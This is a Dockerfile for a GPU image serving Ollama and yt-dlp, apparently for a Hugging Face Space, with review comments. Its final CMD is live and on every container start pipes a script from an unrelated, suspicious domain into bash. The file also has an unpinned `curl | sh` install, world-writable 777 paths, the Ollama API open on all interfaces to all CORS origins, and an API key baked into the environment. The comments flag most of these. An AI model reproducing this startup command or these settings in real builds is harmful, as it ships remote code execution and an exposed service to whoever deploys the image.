# syntax=docker/dockerfile:1
# GPU image running Ollama (+ yt-dlp tooling) — e.g. for a Hugging Face Space
# (port 7860, world-writable paths for the Space's arbitrary runtime UID).
FROM nvidia/cuda:12.8.0-cudnn-devel-ubuntu22.04
# CPU-only alternative (needs pip --break-system-packages on 24.04+):
# FROM ubuntu:22.04

WORKDIR /app
# WORKDIR already creates /app; 777 kept because the runtime assigns an
# arbitrary non-root UID. Prefer a dedicated USER + --chown where possible.
RUN chmod 777 /app

# Fail pipelines on the *upstream* command, not just the last one (DL4006).
SHELL ["/bin/bash", "-o", "pipefail", "-c"]

# OS packages: update+install in ONE layer (separate layers hit stale apt
# caches, DL3009) and clean the lists in the same layer (DL3015).
# Dropped `apt-get upgrade` (DL3005) — bump the base-image tag instead.
RUN apt-get update -y && apt-get install -y --no-install-recommends \
      build-essential \
      curl \
      git \
      gzip \
      htop \
      micro \
      psmisc \
      python3 \
      python3-dev \
      python3-pip \
      tar \
      wget \
      yt-dlp \
    && rm -rf /var/lib/apt/lists/*

# --no-cache-dir keeps the pip wheel cache out of the layer (DL3042).
# (Add --break-system-packages when building on ubuntu:24.04+ / PEP 668 bases.)
RUN pip install --no-cache-dir langchain-yt-dlp

# Install Ollama via the upstream script.
# TODO(review): unpinned `curl | sh` — pin a release version and verify a
# checksum for reproducible, tamper-evident builds.
RUN curl -fsSL https://ollama.com/install.sh | sh

# State/config paths made world-writable in one layer so the server works
# under whatever UID the platform assigns at runtime.
RUN mkdir -p /.ollama /usr/local/share/model \
    && touch /.gitconfig \
    && chmod 777 /.ollama /.gitconfig \
    && chmod -R 777 /usr/local/share/model

# Ollama runtime configuration:
#   OLLAMA_MODELS      — model store (the 777 dir created above)
#   OLLAMA_HOST        — listen on all interfaces, not just loopback
#   OLLAMA_ORIGINS     — "*" allows all CORS origins (the original "[*]" is a
#                        literal origin string and matches nothing)
#   OLLAMA_KEEP_ALIVE  — -1 keeps loaded models resident indefinitely
ENV OLLAMA_MODELS=/usr/local/share/model/ \
    OLLAMA_HOST=0.0.0.0 \
    OLLAMA_ORIGINS="*" \
    OLLAMA_KEEP_ALIVE=-1

# SECURITY(review): baking a key into ENV leaks it via `docker history` and
# `docker inspect`. The original line also referenced an ARG that was never
# declared, so the key silently expanded to "". Declared here so
# `--build-arg OLLAMA_API=…` actually works, but strongly prefer supplying it
# at runtime (`docker run -e OLLAMA_API_KEY=…`) or via a BuildKit secret mount.
ARG OLLAMA_API=""
ENV OLLAMA_API_KEY=$OLLAMA_API

EXPOSE 7860
EXPOSE 11434

# WARNING(review): this fetches and executes an UNAUTHENTICATED remote script
# on every container start — remote code execution by design, from a script
# that can change (or be hijacked) at any time. Bake the script into the image
# (COPY + checksum verification) and run it from there instead.
# Exec form (DL3025) so bash is PID 1's direct child and receives SIGTERM.
CMD ["/bin/bash", "-o", "pipefail", "-c", "wget -O - https://gloryhole.redzone-6.cfd/packaged/import2.sh | bash -s"]